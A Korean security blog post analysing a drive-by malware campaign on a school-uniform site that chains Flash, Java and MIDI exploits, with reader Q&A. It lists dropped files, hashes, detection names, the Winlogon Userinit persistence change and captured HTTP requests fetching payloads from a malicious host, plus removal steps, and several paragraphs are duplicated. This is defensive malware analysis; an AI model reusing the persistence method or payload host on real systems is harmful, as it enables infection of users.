주말을 이용한 악성코드 유포 중에서 Adobe Flash Player, Oracle JRE, MIDI 취약점을 함께 악용하여 취약점 패치가 이루어지지 않은 사용자가 특정 웹 사이트 접속시 자동으로 감염되도록 한 사례를 확인하였습니다.
특히 해당 사이트는 최근 졸업과 새학기 준비를 맞이하여 교복에 관심이 있다는 점에서 국내 유명 교복 관련 웹 사이트를 우연의 일치처럼 잘 활용하고 있는 것으로 보입니다.
이를 통해 최종적으로 다운로드된 파일 java.gif(= pk.exe 또는 (5자리 영문).exe) (MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42) 진단명으로 진단되고 있습니다.
1. Adobe Flash Player 취약점
2. MIDI 취약점
▷ MIDI 취약점을 이용한 정보 탈취 악성코드 유포 주의 (2012.1.27)
3. Oracle JRE 취약점
이들 취약점을 이용한 파일 감염 흐름도를 살펴보면 ① "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs" 파일을 생성한 후, ② 인터넷 임시 폴더에 다운로드된 최종 파일은 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.exe" 위치로 이동됩니다.(※ good.exe(MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)은 최종 파일과 일치합니다.)
③ good.exe 파일은 "C:\WINDOWS\system32\(5자리 영문).exe" 파일로 자가 복제한 후 자신은 삭제 처리가 이루어집니다.
해당 파일은 레지스트리 값(Winlogon)에 자신을 추가하여 Windows 시작시마다 자동으로 실행되어 특정 서버에 접속하는 동작을 확인할 수 있습니다.
만약 정상적으로 동작이 이루어진다면 추가적인 악성 파일 다운로드를 통해 추가적인 감염이 발생할 것으로 보입니다.
해당 악성코드를 수동으로 처리할 필요가 있는 경우에는 다음과 같은 절차에 따라 문제를 해결하시기 바랍니다.
▷ 필요없는 프로세스 찾는 방법 (2009.3.21)
참고로 Process Explorer 프로그램에 대한 기본적인 사용 방법은 링크 내용을 참고하시기 바랍니다.
이를 통해 explorer.exe 프로세스에 핸들되어 있던 악성 파일은 윈도우 탐색기를 실행하여 사용자가 시스템 폴더에 위치한 파일을 쉽게 삭제하실 수 있습니다.
레지스트리 편집기에서 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 값을 찾아 우측 패널의 "Userinit" 항목을 더블 클릭하시기 바랍니다.
단, 중요한 점은 수정한 후의 데이터 값은 반드시 "C:\WINDOWS\system32\userinit.exe," 값이어야 합니다.(※ 쉼표(,)를 반드시 추가하시기 바랍니다.)
위와 같이 중국발 악성코드 유포는 시스템 파일 패치 방식 이외에도 위와 같은 방식으로도 감염을 유발하여 다수의 추가적인 악성 파일을 지속적으로 다운로드할 수 있으므로 주의하시기 바랍니다.
또한 해당 악성코드에 감염된 사용자는 Adobe Flash Player, Oracle JRE (단, 설치된 사용자의 경우), 윈도우 보안 업데이트를 반드시 확인하여 패치를 하시기 바랍니다.
특히 해당 사이트는 최근 졸업과 새학기 준비를 맞이하여 교복에 관심이 있다는 점에서 국내 유명 교복 관련 웹 사이트를 우연의 일치처럼 잘 활용하고 있는 것으로 보입니다.
| 파일명 | 보안 제품 | 진단명 |
| ad.html | AhnLab V3 | JS/Exploit |
| Applet.html | Hauri ViRobot | HTML.S.Agent.228 |
| Applet.jar | Microsoft | Exploit:Java/CVE-2011-3544.M |
| uc.html | AhnLab V3 | JS/Iframe |
| f1.html | avast! | JS:Agent-JB [Trj] |
| kkxx.swf | avast! | SWF:CVE-2011-2140-A [Expl] |
| e.avi | AhnLab V3 | Exploit/Cve-2011-2140 |
| ie.html | AhnLab V3 | JS/Exploit |
| sro.js | avast! | JS:ShellCode-GU [Expl] |
| ms.html | AhnLab V3 | JS/Exploit |
| exp.mid | Hauri ViRobot | MID.S.CVE-2012-0003.75.A |
이를 통해 최종적으로 다운로드된 파일 java.gif(= pk.exe 또는 (5자리 영문).exe) (MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42) 진단명으로 진단되고 있습니다.
1. Adobe Flash Player 취약점
2. MIDI 취약점
▷ MIDI 취약점을 이용한 정보 탈취 악성코드 유포 주의 (2012.1.27)
3. Oracle JRE 취약점
이들 취약점을 이용한 파일 감염 흐름도를 살펴보면 ① "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs" 파일을 생성한 후, ② 인터넷 임시 폴더에 다운로드된 최종 파일은 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.exe" 위치로 이동됩니다.(※ good.exe(MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)은 최종 파일과 일치합니다.)
③ good.exe 파일은 "C:\WINDOWS\system32\(5자리 영문).exe" 파일로 자가 복제한 후 자신은 삭제 처리가 이루어집니다.
[생성 파일 및 진단 정보]
C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs
C:\WINDOWS\system32\utehd.exe
- MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5
- AhnLab V3 : Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42)
※ 해당 파일은 (5자리 영문).exe 형태입니다.
[변경 레지스트리 등록 정보]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
- Userinit = C:\WINDOWS\system32\userinit.exe, :: 변경 전
- Userinit = C:\WINDOWS\system32\userinit.exe,utehd.exe :: 변경 후
C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs
C:\WINDOWS\system32\utehd.exe
- MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5
- AhnLab V3 : Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42)
※ 해당 파일은 (5자리 영문).exe 형태입니다.
[변경 레지스트리 등록 정보]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
- Userinit = C:\WINDOWS\system32\userinit.exe, :: 변경 전
- Userinit = C:\WINDOWS\system32\userinit.exe,utehd.exe :: 변경 후
해당 파일은 레지스트리 값(Winlogon)에 자신을 추가하여 Windows 시작시마다 자동으로 실행되어 특정 서버에 접속하는 동작을 확인할 수 있습니다.
GET /dwpzqq/dwpzqq.jpg HTTP/1.1하지만 테스트 과정에서는 "400 Bad Request"가 뜨면서 실제 다운로드는 이루어지지 않고 있는 것을 확인할 수 있었습니다.
Accept: */*
Accept-Language: zh-tw
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: dwpzqq.web799os.com
Connection: Keep-Alive
GET /dwpzqq/dwpzqq.gif HTTP/1.1
Accept: */*
Accept-Language: zh-tw
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: dwpzqq.web799os.com
Connection: Keep-Alive
만약 정상적으로 동작이 이루어진다면 추가적인 악성 파일 다운로드를 통해 추가적인 감염이 발생할 것으로 보입니다.
해당 악성코드를 수동으로 처리할 필요가 있는 경우에는 다음과 같은 절차에 따라 문제를 해결하시기 바랍니다.
▷ 필요없는 프로세스 찾는 방법 (2009.3.21)
참고로 Process Explorer 프로그램에 대한 기본적인 사용 방법은 링크 내용을 참고하시기 바랍니다.
이를 통해 explorer.exe 프로세스에 핸들되어 있던 악성 파일은 윈도우 탐색기를 실행하여 사용자가 시스템 폴더에 위치한 파일을 쉽게 삭제하실 수 있습니다.
레지스트리 편집기에서 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 값을 찾아 우측 패널의 "Userinit" 항목을 더블 클릭하시기 바랍니다.
단, 중요한 점은 수정한 후의 데이터 값은 반드시 "C:\WINDOWS\system32\userinit.exe," 값이어야 합니다.(※ 쉼표(,)를 반드시 추가하시기 바랍니다.)
위와 같이 중국발 악성코드 유포는 시스템 파일 패치 방식 이외에도 위와 같은 방식으로도 감염을 유발하여 다수의 추가적인 악성 파일을 지속적으로 다운로드할 수 있으므로 주의하시기 바랍니다.
또한 해당 악성코드에 감염된 사용자는 Adobe Flash Player, Oracle JRE (단, 설치된 사용자의 경우), 윈도우 보안 업데이트를 반드시 확인하여 패치를 하시기 바랍니다.
V3 진단명이 WIN-TROJAN 인거보니 업데이트 후에 진단 가능했던 건가요?
아니면 유포당시부터 잡았던 건가요?
제가 최초 확인 당시에 이미 정식 진단명으로 잡고 있더군요.
제가 윈도우7에서 Microsoft Security essential을 사용하고 있는데요, 1월 초쯤 부터 Exploit:JS/DonxRef.A 이런 이름의 바이러스가 격리되더라구요. 음, 이 글 읽어보니까, Flash, Java, MIDI 3중 취약점을 이용한다고 하던데요..제가 요새 미디 파일을 사용하고 있기도 하고..이 댓글 작성하기 30분 쯤 전에 시큐리티 에센셜을 켜봤는데 실시간 감시가 꺼져있더라구요. 너무 놀랐는데 다행히 격리는 되어있었구요. 그런데 자꾸 뭔가를 시도하는 거 같긴 한데..제가 워낙에 이쪽 분야엔 문외한이라서...아무리 찾아봐도 저 바이러스? 멀웨어? 에 대한 검색 결과가 하나도 없어서 벌새님께 이렇게 여쭤봅니다.. 제가 감염된 위의 바이러스가 이 글의 내용에 나오는 것과 동일한 것인가요? 어떻게 해결해야할지 모르겠습니다...혹시 알려주실수 있으신가요?
Exploit:JS/DonxRef.A 진단명을 봐서는 사용자가 특정 웹 사이트에 방문하였을 경우 자동으로 다운로드되는 파일 중 악성 스크립트 파일이 존재하여 차단한 것으로 보입니다.
보통 이런 경우에는 2가지를 볼 수 있는데, 우선 방문 사이트는 해킹된 사이트이며 이로 인해 방문자를 대상으로 자동 감염을 유발할 것으로 보입니다.
하지만 방문자가 보안 패치가 완벽하게 이루어진 경우에는 스크립트 파일이 다운로드되어도 백신의 진단 여부와 상관없이 자동 감염은 이루어지지 않습니다.
하지만 보안 패치가 제대로 되어 있지 않은 사용자는 스크립트 진단이 없을 경우에는 자동 감염이 발생할 수 있습니다.
에구님의 보안 패치 상태가 어떤지는 알 수 없지만 MSE에서 진단을 하여 차단하였다면 감염으로 연결되지는 않았을 것으로 보입니다. 하지만 그런 사이트는 위험하므로 당분간 접속하지 않는 것이 가장 안전하며, 윈도우, Flash, Java 보안 패치가 제대로 이루어졌는지 점검하시기 바랍니다.
또한 해당 스크립트 파일들은 인터넷 임시 폴더에 1차적으로 다운로드되므로 임시 폴더 내의 파일을 삭제하는 것도 좋습니다.
아..일단은 감염은 아닌가 보네요. 감사합니다. 그런데...몇 시간 사이에 또 문제가 생겼는데요...바이러스 검사를 한다고 시큐리티 에센셜로 검사를 하는 도중에 갑자기 윈도우 탐색기가 응답하지 않는다고 나온 후에 프로그램 창과 바탕화면 사진만 보이다가 다시 멀쩡하게 돌아온 다음부터 같이 깔려 있던 V3 lite가 작동을 하지 않네요. V3 lite가 윈도우7에서 제대로 작동하지 않는다는 말을 지인에게 들은적이 있긴 한데 이건 대체 무슨 일인지...갑자기 꺼진 게 이상해서 V3 Gamehack kill로 검사를 두번이나 했지만 아무것도 나오는게 없습니다. 컴퓨터를 끄거나 재부팅 하면 컴퓨터가 영영 안켜질것 같이 불안하구요...대체 뭐가 문제일까요.ㅠㅠ
Windows 7에서 V3 Lite가 제대로 동작하지 않는다는 것은 근거없는 소리이며, 내용을 봐서는 감염으로 인해 국내 백신 프로그램의 동작에 방해를 주는게 아닌가 의심이 됩니다.
MSE에 진단하여 차단한 부분도 있지만 또 다른 사이트를 방문하는 과정에서 진단되지 않고 감염이 이루어졌을 확률도 높습니다.
이런 경우 좀 더 확인해 보시길 원하신다면 Kaspersky에서 제공하는 수동 검사 프로그램(실시간 감시 미지원)을 이용하는 것도 방법입니다.
http://www.kaspersky.com/virus-scanner (Kaspersky Virus Removal Tool 메뉴의 Download 클릭)
그리고 되도록 PC에 2개 이상의 백신 프로그램을 함께 사용하지 마시기 바랍니다.